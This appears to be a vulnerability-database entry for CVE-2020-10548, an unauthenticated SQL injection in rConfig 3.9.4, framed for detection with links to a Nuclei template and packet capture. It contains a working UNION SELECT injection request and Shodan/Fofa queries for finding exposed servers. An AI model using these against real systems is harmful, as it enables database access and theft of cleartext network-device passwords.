🔙 목록으로 돌아가기

CVE-2020-10548: rConfig 3.9.4 - SQL Injection

TitlerConfig 3.9.4 - SQL Injection
Authormadrobot
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
RemediationUpgrade to a patched version of rConfig or apply the necessary security patches provided by the vendor.
CVSS Score9.8
EPSS Score0.92752
CVE IDCVE-2020-10548
CWE IDCWE-89
Shodan Queryhttp.title:"rconfig"
Fofa Querytitle="rconfig"
Tags cve cve2020 rconfig sqli vkev vuln

🔍 Vulnerability Description

rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes’ passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

🌐 HTTP Request

GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10548.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-10548.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A